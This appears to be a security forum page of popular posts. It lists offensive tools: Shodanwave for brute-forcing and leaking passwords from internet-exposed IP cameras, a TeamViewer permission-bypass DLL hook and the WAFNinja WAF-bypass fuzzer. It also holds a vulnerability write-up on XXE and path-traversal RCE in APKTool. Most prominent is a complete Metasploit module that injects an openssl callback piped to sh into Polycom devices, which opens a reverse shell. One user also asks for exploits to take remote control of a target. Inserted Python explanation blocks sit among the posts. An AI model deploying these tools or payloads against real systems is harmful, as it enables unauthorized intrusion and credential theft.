
Leaderboard

Popular Content

Showing content with the highest reputation on 12/06/17 in all areas

  1. Invest in eggs. Thank me later.
    3 points
  2. Shodanwave

Shodanwave is a tool for exploring and obtaining information from cameras, specifically Netwave IP cameras. The tool uses a search engine called Shodan that makes it easy to search for cameras online.

What does the tool do? Look, a list!

  - Search
  - Brute force
  - SSID and WPAPSK password disclosure
  - E-mail, FTP, DNS, MSN password disclosure
  - Exploit

This is an example of Shodanwave running: the password was not found through brute force, so the tool tries to leak the camera's memory. If the tool finds the password, it does not try to leak the memory.

Demo: https://asciinema.org/a/G7gVOiReMiv43V8wlMbB4mm9B?autoplay=1

How to use?

To use Shodanwave you need an API key, which you can get for free at https://www.shodan.io/; then follow the next steps.

Installation

    $ cd /opt/
    $ git clone https://github.com/fbctf/shodanwave.git
    $ cd shodanwave
    $ pip install -r requirements.txt

Usage

    Usage: python shodanwave.py -u usernames.txt -w passwords.txt -k Shodan API key --t OUTPUT

    python shodanwave.py --help
    [ASCII art banner: shodanwave]
    This tool is successfully connected to shodan service
    Information the use of this tool is illegal, not bad.

    usage: shodanwave.py [-h] [-s SEARCH] [-u USERNAME] [-w PASSWORD] [-k ADDRESS]

    optional arguments:
      -h, --help            show this help message and exit
      -s SEARCH, --search SEARCH
                            Default Netwave IP Camera
      -u USERNAME, --username USERNAME
                            Select your usernames wordlist
      -w PASSWORD, --wordlist PASSWORD
                            Select your passwords wordlist
      -k ADDRESS, --shodan ADDRESS
                            Shodan API key
      -l LIMIT, --limit LIMIT
                            Limit the number of records returned by Shodan
      -o OFFSET, --offset OFFSET
                            Shodan skips this number of records from the response
      -t OUTPUT, --output OUTPUT
                            Save the results

Attention: use this tool wisely and not for evil.

To get the best performance out of this tool you need to pay for Shodan to get full API access. The options --limit and --offset may need a paid API key and consume query credits from your Shodan account.

Disclaimer: code samples are provided for educational purposes. Adequate defenses can only be built by researching attack techniques available to malicious actors. Using this code against target systems without prior permission is illegal in most jurisdictions. The authors are not liable for any damages from misuse of this information or code.

Download: sodanwave-master.zip
git clone https://github.com/evilsocketbr/shodanwave.git
Source: https://github.com/evilsocketbr/shodanwave
    2 points
  3. Researchers: Eran Vaknin, Gal Elbaz, Alon Boxiner, Oded Vanunu

The latest research from the Check Point Research Team has revealed several vulnerabilities that put each and every organization that does any type of Java/Android development at great risk of a threat actor exploiting these vulnerabilities and penetrating them. The vulnerabilities in question are in the developer tools, both downloadable and cloud-based, that the Android application ecosystem, the largest application community in the world, is using. This includes the tools that all Java/Android programmers use to build their companies' business applications and that security analysts and reverse engineers use to do their work.

As seen in WikiLeaks' 'Vault 7' release earlier this year, the CIA and NSA are exploiting vulnerabilities in products of companies of all sizes, all over the world. Earlier this year we saw incidents of the CIA hacking CCleaner, Notepad++ and many more, with the aim of spreading malware into organizations and acquiring information on their users and on the companies themselves.

Through our own research we have found several vulnerabilities that affect the most common Android IDEs – Google's Android Studio, JetBrains' IntelliJ IDEA and Eclipse – as well as the major reverse engineering tools for Android applications, such as APKTool, the Cuckoo-Droid service and more. Our research below illustrates how we exploited these tools to gain access to internal files. Since this research, Check Point reported the discovery to the APKTool developers and the other IDE companies back in May 2017. In turn, Google and JetBrains have verified and acknowledged the security issues and have since effectively deployed a fix.

Technical Details – From XXE to RCE: Attacking The Second Layer

The first stage of our research was focused on APKTool (Android Application Package Tool). As the most popular tool for reverse engineering third-party Android apps, APKTool is used for supporting custom platforms, analyzing applications and much more, including the decoding and rebuilding of resources. The two main features of APKTool are:

  1. Decompiling an APK file.
  2. Building an APK file.

From our research we found that APKTool is vulnerable in both of these main features. By looking at the source code of APKTool, we managed to identify an XML External Entity (XXE) vulnerability, due to the fact that the configured XML parser of APKTool does not disable external entity references when parsing an XML file within the program. The vulnerable function is called loadDocument and it is used in both core functionalities – 'Build' and 'Decompile' – of APKTool.

The vulnerability exposes the whole OS file system of APKTool users; as a result, attackers could potentially retrieve any file on the victim's PC by using a malicious "AndroidManifest.xml" file that exploits the XXE vulnerability, with the file contents then sent to a remote attacker server. And this attack scenario is just one of many possible XXE attack techniques that could lead to harmful outcomes.

Realizing the enormity of this vulnerability for the Android developer and researcher community, we extended our research to the vulnerable XML parser, "DocumentBuilderFactory", which is used in the APKTool project.

Vulnerabilities in Developer Tools

This led us to find multiple vulnerable implementations of the XML parser within other projects. Moreover, we identified that the most popular IDEs used for building Android applications are affected, including IntelliJ, Eclipse and Android Studio. By simply loading the malicious "AndroidManifest.xml" file as part of any Android project, the IDEs start spitting out any file configured by the attacker.

To demonstrate this vulnerability, we uploaded a malicious project library to GitHub and cloned it into an Android Studio project.

[image: Example of a malicious GitHub project with the XXE payload]
[image: Cloned to Android Studio]
[image: Result]

The attack was delivered successfully, and the protected file was stolen and sent to the presented attacker's server without the user being aware of it (see image above).

Furthermore, we found another attack scenario that can be used in the wild to attack a massive range of Android developers: injecting a malicious AAR (Android Archive Library) containing our XXE payload into repositories. It is possible, for example, to upload an infected AAR to a public repository such as the central Maven repository, though for demonstration purposes we uploaded an infected AAR to a local repository. Cloning the infected AAR from the repository would allow the attacker to steal sensitive files such as configuration files, source code, proprietary company data and much more from the victim's OS file system.

[image: Uploading a malicious AAR to a local repository]
[image: Adding the AAR to an Android Studio project]
[image: Result]

The attack was delivered successfully, and the protected file was stolen and sent to the presented attacker's server without the user being aware of it.

Further research of APKTool then led us to find an additional vulnerability that allows us to execute OS commands on a victim's PC. For advanced use of APKTool there is a configuration file named "APKTOOL.YML". This file contains an interesting section called "unknownFiles", which allows users to include a non-standard file location that will be placed correctly during the rebuild of an APK. The selected files are saved on the filesystem in the 'Unknown' folder.

A legitimate "APKTOOL.YML" file structure looks like this:

[image: legitimate APKTOOL.YML]

By manipulating the path in the "unknownFiles" section of the "APKTOOL.YML" file, it is possible to inject arbitrary files anywhere on the file system (Path Traversal). This is because APKTool does not validate the path to which the unknown files will be extracted from the packed APK. Injecting arbitrary files anywhere in the filesystem leads to full Remote Code Execution (RCE), meaning that any APKTool user/service that tries to decode a crafted malicious APK is vulnerable to RCE.

For demonstration purposes, we created a web application similar to the official online APK decoder (https://apk.tools). APKTool will extract the malicious file (in this case we used a PHP web shell) to the wwwroot folder of that server:

[image: modified APKTOOL.YML with the traversal path]

After building the APK with the modified configuration file, the result is a compressed APK with our malicious file inside the malformed path. Uploading the APK to the demo site allows the attacker to execute OS commands on the web application server. This attack could thus be launched against any online/offline service that decodes APKs behind the scenes using APKTool.

The way we chose to demonstrate this vulnerability is of course just one of many possible attack methods that can be used to achieve full RCE. Indeed, the Path Traversal method lets us copy any file to any location on the file system, making the attack surface wide and varied. All the attack methods demonstrated above are cross-platform and generic and, as APKTool is designed to work on top of several operating systems, it is also possible to attack any system on which it operates without restriction or limitation.

It is impossible to estimate the number of users of this well-known open source project. Yet, knowing that among them are some large services and companies (e.g. https://apk.tools, http://www.javadecompilers.com/APKTool, https://www.apkdecompilers.com/, http://undroid.av-comparatives.info, Cuckoo-Droid and many more), we contacted the APKTool developer and the IDE companies and are pleased to report that they all fixed the security issues and released updated and improved versions of their products.

Source: https://research.checkpoint.com/parsedroid-targeting-android-development-research-community/
    1 point
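The post above describes two input-handling defects in APKTool: an XML parser that resolves external entities in AndroidManifest.xml, and an unknownFiles section in apktool.yml whose paths are written to disk without normalisation. The checks below are an added example, not Check Point's or APKTool's code, showing what a decoding service should refuse before handing either file to the real tool. The manifests and the apktool.yml are constructed samples; the entity name, file path and directory names are placeholders, not the researchers' payload.

```python
"""Pre-parse checks for the two APKTool attack paths in the write-up above: an
external-entity (XXE) payload in AndroidManifest.xml and a path-traversal key
under unknownFiles in apktool.yml. Added example; not Check Point's or APKTool's
code. All sample inputs are constructed."""
import posixpath
import re
import xml.parsers.expat

# Constructed manifest carrying the XXE shape described in the article
# (entity name, file path and package name are placeholders).
MALICIOUS_MANIFEST = b"""<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE manifest [
  <!ENTITY leak SYSTEM "file:///etc/hostname">
]>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.app">&leak;</manifest>
"""

BENIGN_MANIFEST = b"""<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.app"><application/></manifest>
"""

# Constructed apktool.yml with one legitimate entry and one that escapes.
APKTOOL_YML = """!!brut.androlib.meta.MetaInfo
apkFileName: sample.apk
unknownFiles:
  hidden/notes.txt: '8'
  ../../../var/www/html/shell.php: '8'
version: 2.3.0
"""


def xml_entity_findings(data: bytes) -> list:
    """List every DOCTYPE and entity declaration in an XML document.

    Expat only reports declarations to these handlers; it never fetches an
    external entity unless an ExternalEntityRefHandler does so, and none is
    installed here, so the check is safe on untrusted input. A manifest with
    any finding should be rejected before the real (Java) parser sees it."""
    findings = []
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        findings.append(("doctype", name, system_id))

    def on_entity(name, is_param, value, base, system_id, public_id, notation):
        kind = "external" if (system_id or public_id) else "internal"
        findings.append(("entity", name, kind, system_id))

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    try:
        parser.Parse(data, True)
    except xml.parsers.expat.ExpatError:
        pass  # malformed input; declarations seen so far are already recorded
    return findings


def is_contained(root: str, rel: str) -> bool:
    """True when root/rel, normalised, still lies under root (no traversal,
    no absolute path, no Windows drive prefix)."""
    rel = rel.replace("\\", "/")
    if rel.startswith("/") or re.match(r"^[A-Za-z]:", rel):
        return False
    joined = posixpath.normpath(posixpath.join(root, rel))
    return joined == root or joined.startswith(root + "/")


def unsafe_unknown_files(apktool_yml: str, root: str = "unknown") -> list:
    """Simplified reader for the unknownFiles block of apktool.yml (not a full
    YAML parser): return every path that would land outside the unknown dir."""
    unsafe, in_block = [], False
    for line in apktool_yml.splitlines():
        if not line.startswith(" "):            # a top-level key ends the block
            in_block = line.strip() == "unknownFiles:"
            continue
        if in_block:
            path = line.strip().rsplit(":", 1)[0].strip("'\"")
            if not is_contained(root, path):
                unsafe.append(path)
    return unsafe


if __name__ == "__main__":
    print(xml_entity_findings(MALICIOUS_MANIFEST))   # doctype + external entity
    print(xml_entity_findings(BENIGN_MANIFEST))      # nothing to report
    print(unsafe_unknown_files(APKTOOL_YML))         # the traversal entry only
```

The XML check rejects any DOCTYPE at all rather than only external entities, because an Android manifest never legitimately carries one and internal entities are still a billion-laughs vector. The path check normalises with posixpath on purpose so that a backslash or drive letter from a Windows-built APK cannot slip past a check written for Unix separators.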
  4. A proof-of-concept injectable C++ DLL that uses naked inline hooking and direct memory modification to change your TeamViewer permissions.

Features

As the server: enables extra menu item options on the right-side pop-up menu. Most useful so far to enable the "switch sides" feature, which is normally only active after you have already authenticated control with the client and initiated a change of control/sides.

As the client: allows control of the mouse with disregard to the server's current control settings and permissions.

Demo

Rundown

Utilizes signature/pattern scanning to dynamically locate key parts in the code at which the assembly registers hold pointers to interesting classes. Applies inline naked hooks, a.k.a. code caves, to hijack the pointers to use for modification via direct memory access to their reversed classes.

Inject and follow the steps.

Requirements

Your favorite manual mapper, PE loader or DLL injector; inject into "TeamViewer.exe". This version was built on Windows 10 for TeamViewer x86 version 13.0.5058 (other versions of TeamViewer have not been tested, but with more robust signatures it may work; Linux not supported).

Disclaimer

Developed for educational purposes as a proof of concept for testing. I do not condone or support the use of this software for unethical or illicit purposes. No responsibility is held or accepted for misuse.

Credit

@timse93 - research and testing

Download: TeamViewer_Permissions_Hook_V1-master.zip
Source: https://github.com/gellin/TeamViewer_Permissions_Hook_V1
    1 point
  5. Within the Polycom command shell, a command execution flaw exists in lan traceroute, one of the dev commands, which allows an attacker to execute arbitrary payloads with telnet or openssl.

    ##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##

    class MetasploitModule < Msf::Exploit::Remote
      Rank = ExcellentRanking

      include Msf::Exploit::Remote::Tcp

      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'Polycom Shell HDX Series Traceroute Command Execution',
          'Description'    => %q{
            Within Polycom command shell, a command execution flaw exists in lan traceroute,
            one of the dev commands, which allows for an attacker to execute arbitrary payloads
            with telnet or openssl.
          },
          'Author'         =>
            [
              'Mumbai',
              'staaldraad', # https://twitter.com/_staaldraad/
              'Paul Haas <Paul [dot] Haas [at] Security-Assessment.com>', # took some of the code from polycom_hdx_auth_bypass
              'h00die <mike@shorebreaksecurity.com>' # stole the code, creds to them
            ],
          'References'     =>
            [
              ['URL', 'https://staaldraad.github.io/2017/11/12/polycom-hdx-rce/']
            ],
          'DisclosureDate' => 'Nov 12 2017',
          'License'        => MSF_LICENSE,
          'Platform'       => 'unix',
          'Arch'           => ARCH_CMD,
          'Stance'         => Msf::Exploit::Stance::Aggressive,
          'Targets'        => [[ 'Automatic', {} ]],
          'Payload'        =>
            {
              'Space'       => 8000,
              'DisableNops' => true,
              'Compat'      => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'telnet generic openssl' }
            },
          'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse' },
          'DefaultTarget'  => 0
        ))

        register_options(
          [
            Opt::RHOST(),
            Opt::RPORT(23),
            OptString.new('PASSWORD', [ false, "Password to access console interface if required." ]),
            OptAddress.new('CBHOST', [ false, "The listener address used for staging the final payload" ]),
            OptPort.new('CBPORT', [ false, "The listener port used for staging the final payload" ])
          ])
      end

      def check
        connect
        Rex.sleep(1)
        res = sock.get_once
        disconnect
        # The posted version tested `!res && !res.empty?`, which raises NoMethodError
        # when the device sends no banner (res is nil); test nil and empty separately.
        if res.nil? || res.empty?
          return Exploit::CheckCode::Unknown
        elsif res =~ /Welcome to ViewStation/ || res =~ /Polycom/
          return Exploit::CheckCode::Detected
        end
        Exploit::CheckCode::Unknown
      end

      def exploit
        unless check == Exploit::CheckCode::Detected
          fail_with(Failure::Unknown, "#{peer} - Failed to connect to target service")
        end

        #
        # Obtain banner information
        #
        sock = connect
        Rex.sleep(2)
        banner = sock.get_once
        vprint_status("Received #{banner.length} bytes from service")
        vprint_line("#{banner}")

        if banner =~ /password/i
          print_status("Authentication enabled on device, authenticating with target...")
          if datastore['PASSWORD'].nil?
            print_error("#{peer} - Please supply a password to authenticate with")
            return
          end
          # couldn't find where to enable auth in web interface or telnet...but according to other module it exists..here in case.
          sock.put("#{datastore['PASSWORD']}\n")
          res = sock.get_once
          if res =~ /Polycom/
            print_good("#{peer} - Authenticated successfully with target.")
          elsif res =~ /failed/
            print_error("#{peer} - Invalid credentials for target.")
            return
          end
        elsif banner =~ /Polycom/ # praise jesus
          print_good("#{peer} - Device has no authentication, excellent!")
        end

        do_payload(sock)
      end

      def do_payload(sock)
        # Prefer CBHOST, but use LHOST, or autodetect the IP otherwise
        cbhost = datastore['CBHOST'] || datastore['LHOST'] || Rex::Socket.source_address(datastore['RHOST'])

        # Start a listener
        start_listener(true)

        # Figure out the port we picked
        cbport = self.service.getsockname[2]

        # ${IFS} stands in for spaces the shell would otherwise split on; the
        # backticks run the openssl client and pipe the staged payload into sh.
        cmd = "devcmds\nlan traceroute `openssl${IFS}s_client${IFS}-quiet${IFS}-host${IFS}#{cbhost}${IFS}-port${IFS}#{cbport}|sh`\n"
        sock.put(cmd)

        if datastore['VERBOSE']
          Rex.sleep(2)
          resp = sock.get_once
          vprint_status("Received #{resp.length} bytes in response")
          vprint_line(resp)
        end

        # Give time for our command to be queued and executed
        1.upto(5) do
          Rex.sleep(1)
          break if session_created?
        end
      end

      def stage_final_payload(cli)
        print_good("Sending payload of #{payload.encoded.length} bytes to #{cli.peerhost}:#{cli.peerport}...")
        cli.put(payload.encoded + "\n")
      end

      def start_listener(ssl = false)
        comm = datastore['ListenerComm']
        if comm == 'local'
          comm = ::Rex::Socket::Comm::Local
        else
          comm = nil
        end

        self.service = Rex::Socket::TcpServer.create(
          'LocalPort' => datastore['CBPORT'],
          'SSL'       => ssl,
          'SSLCert'   => datastore['SSLCert'],
          'Comm'      => comm,
          'Context'   =>
            {
              'Msf'        => framework,
              'MsfExploit' => self
            }
        )

        self.service.on_client_connect_proc = proc { |client|
          stage_final_payload(client)
        }

        # Start the listening service
        self.service.start
      end

      # Shut down any running services
      def cleanup
        super
        if self.service
          print_status("Shutting down payload stager listener...")
          begin
            self.service.deref if self.service.is_a?(Rex::Service)
            if self.service.is_a?(Rex::Socket)
              self.service.close
              self.service.stop
            end
            self.service = nil
          rescue ::Exception
          end
        end
      end

      # Accessor for our TCP payload stager
      attr_accessor :service
    end

Source: https://packetstormsecurity.com/files/145225/Polycom-Shell-HDX-Series-Traceroute-Command-Execution.html
    1 point
  6. I thought you would also recommend two or three hacker girls to make our eggs grow.
    1 point
  7. UPnP? If the router has it enabled. Give some more details. What do you need it for?

Edit: @Dragos Well, it can be done, for example BitTorrent. When you run a server from the Wi-Fi network you have the problem of "traversing" the NAT, which hides your server behind the local IP. There is a universal solution for NAT traversal and that is the UPnP protocol (Universal Plug and Play). Not all NATs have UPnP enabled, but if they do you can announce a port forward through this protocol. Google it and you will find programs that let you play with the protocol. With one search I found: http://www.raidenhttpd.com/en/manual/en-upnp.html (I HAVE NOT TESTED WHAT IT IS!) If it does not have UPnP enabled and it does not work, you have no other options (as far as I know), except to use an intermediary.
    1 point
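The reply above says UPnP lets a host behind NAT announce a port forward to the router. As an added example (not from the post, nor from the RaidenHTTPD page it links), here is what that exchange looks like on the wire: an SSDP M-SEARCH to find the gateway, the device description that names the WANIPConnection control URL, and the SOAP AddPortMapping request that creates the mapping. The gateway address, the SSDP reply and the description XML are constructed samples; discover() needs a real LAN and is not exercised by the offline checks.

```python
"""UPnP IGD port mapping: the NAT-traversal mechanism mentioned in the reply
above. Added example; the SSDP reply and device description are constructed
samples standing in for a real gateway's answers."""
import socket
import xml.etree.ElementTree as ET
from typing import Optional
from urllib.parse import urljoin, urlparse

SSDP_GROUP = ("239.255.255.250", 1900)
WANIP = "urn:schemas-upnp-org:service:WANIPConnection:1"
DEV_NS = "{urn:schemas-upnp-org:device-1-0}"


def msearch_request(search_target: str = WANIP, mx: int = 2) -> bytes:
    """SSDP discovery datagram; a gateway answers with a LOCATION header."""
    return (
        "M-SEARCH * HTTP/1.1\r\n"
        f"HOST: {SSDP_GROUP[0]}:{SSDP_GROUP[1]}\r\n"
        'MAN: "ssdp:discover"\r\n'
        f"MX: {mx}\r\n"
        f"ST: {search_target}\r\n\r\n"
    ).encode()


def parse_location(ssdp_reply: bytes) -> Optional[str]:
    """Pull the LOCATION header (device description URL) out of an SSDP reply."""
    for line in ssdp_reply.decode(errors="replace").split("\r\n"):
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "location":
            return value.strip()
    return None


def find_control_url(location: str, description_xml: str,
                     service_type: str = WANIP) -> Optional[str]:
    """Walk the nested device tree for the WANIPConnection service and resolve
    its controlURL against the description URL."""
    root = ET.fromstring(description_xml)
    for svc in root.iter(DEV_NS + "service"):
        if svc.findtext(DEV_NS + "serviceType") == service_type:
            return urljoin(location, svc.findtext(DEV_NS + "controlURL"))
    return None


def add_port_mapping_request(control_url: str, ext_port: int, int_port: int,
                             int_client: str, proto: str = "TCP",
                             description: str = "example", lease: int = 0) -> bytes:
    """Full HTTP/SOAP request for AddPortMapping; lease 0 means permanent."""
    u = urlparse(control_url)
    body = (
        '<?xml version="1.0"?>'
        '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" '
        's:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body>'
        f'<u:AddPortMapping xmlns:u="{WANIP}">'
        '<NewRemoteHost></NewRemoteHost>'
        f'<NewExternalPort>{ext_port}</NewExternalPort>'
        f'<NewProtocol>{proto}</NewProtocol>'
        f'<NewInternalPort>{int_port}</NewInternalPort>'
        f'<NewInternalClient>{int_client}</NewInternalClient>'
        '<NewEnabled>1</NewEnabled>'
        f'<NewPortMappingDescription>{description}</NewPortMappingDescription>'
        f'<NewLeaseDuration>{lease}</NewLeaseDuration>'
        '</u:AddPortMapping></s:Body></s:Envelope>'
    ).encode()
    head = (
        f"POST {u.path} HTTP/1.1\r\n"
        f"HOST: {u.netloc}\r\n"
        'CONTENT-TYPE: text/xml; charset="utf-8"\r\n'
        f"CONTENT-LENGTH: {len(body)}\r\n"
        f'SOAPACTION: "{WANIP}#AddPortMapping"\r\n\r\n'
    ).encode()
    return head + body


def discover(timeout: float = 2.0) -> Optional[str]:
    """Send the M-SEARCH on the LAN and return the first LOCATION seen
    (needs a real network; not used by the offline checks)."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP) as s:
        s.settimeout(timeout)
        s.sendto(msearch_request(), SSDP_GROUP)
        try:
            data, _ = s.recvfrom(4096)
        except socket.timeout:
            return None
    return parse_location(data)


# Constructed samples standing in for a real gateway's answers.
SAMPLE_SSDP_REPLY = (b"HTTP/1.1 200 OK\r\nCACHE-CONTROL: max-age=120\r\n"
                     b"ST: " + WANIP.encode() + b"\r\n"
                     b"LOCATION: http://192.168.1.1:5000/rootDesc.xml\r\n\r\n")
SAMPLE_DESCRIPTION = """<?xml version="1.0"?>
<root xmlns="urn:schemas-upnp-org:device-1-0">
 <device><deviceType>urn:schemas-upnp-org:device:InternetGatewayDevice:1</deviceType>
  <deviceList><device><deviceList><device>
   <serviceList><service>
    <serviceType>urn:schemas-upnp-org:service:WANIPConnection:1</serviceType>
    <controlURL>/ctl/IPConn</controlURL>
   </service></serviceList>
  </device></deviceList></device></deviceList>
 </device>
</root>"""

if __name__ == "__main__":
    loc = parse_location(SAMPLE_SSDP_REPLY)
    ctl = find_control_url(loc, SAMPLE_DESCRIPTION)
    print(ctl)
    print(add_port_mapping_request(ctl, 6881, 6881, "192.168.1.50").decode())
```

Nothing in this exchange is authenticated: any host on the LAN can open or delete mappings for any internal client, which is the reason the reply's first question ("if the router has it enabled") matters from a security standpoint as much as from a connectivity one.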
  8. Hi, I apologise for posting in the wrong section. I think I am in the right section now. And I come back to my question: who can help me identify the vulnerabilities of port 80? What exploits can I use to get remote control over the target? So far I have tried all sorts of things and have not succeeded. If someone tells me what I am missing I would be grateful. Thanks, Ossian.
    1 point
  9. And btw, I am not doing anything illegal, but thanks for the heads-up anyway.
    1 point
  10. Thanks for the reply! I understand and accept the level I am at now, but without questions, however absurd they may be, how would there be progress? If my absurd question did not exist I would not have gotten your answer either. Anyway, I understood what you mean and I agree with you, but if you can do some good, either do it or spare yourself the attitude of superiority; in any case I do not want to get into conflict with anyone. Appreciated, Ossian. P.S.: "he who asks is a fool only once, he who never asks is a fool forever"
    1 point
  11. WAFNinja

WAFNinja - Penetration testers' favorite for WAF bypassing

WAFNinja is a CLI tool written in Python. It shall help penetration testers to bypass a WAF by automating the steps necessary for bypassing input validation. The tool was created with the objective of being easily extensible, simple to use and usable in a team environment. Many payloads and fuzzing strings, which are stored in a local database file, come shipped with the tool. WAFNinja supports HTTP connections, GET and POST requests and the use of cookies in order to access pages restricted to authenticated users. Also, an intercepting proxy can be set up.

Usage

    wafninja.py [-h] [-v] {fuzz, bypass, insert-fuzz, insert-bypass, set-db} ...

    EXAMPLE:
    fuzz:
        python wafninja.py fuzz -u "http://www.target.com/index.php?id=FUZZ" -c "phpsessid=value" -t xss -o output.html
    bypass:
        python wafninja.py bypass -u "http://www.target.com/index.php" -p "Name=PAYLOAD&Submit=Submit" -c "phpsessid=value" -t xss -o output.html
    insert-fuzz:
        python wafninja.py insert-fuzz -i select -e select -t sql

    positional arguments:
      {fuzz, bypass, insert-fuzz, insert-bypass, set-db}
                            Which function do you want to use?
        fuzz                check which symbols and keywords are allowed by the WAF.
        bypass              sends payloads from the database to the target.
        insert-fuzz         add a fuzzing string
        insert-bypass       add a payload to the bypass list
        set-db              use another database file. Useful to share the same database with others.

    optional arguments:
      -h, --help            show this help message and exit
      -v, --version         show program's version number and exit

I would appreciate any feedback! Cheers, Khalil.

Download: WAFNinja-master.zip or git clone https://github.com/khalilbijjou/WAFNinja.git
Source: https://github.com/khalilbijjou/WAFNinja
    1 point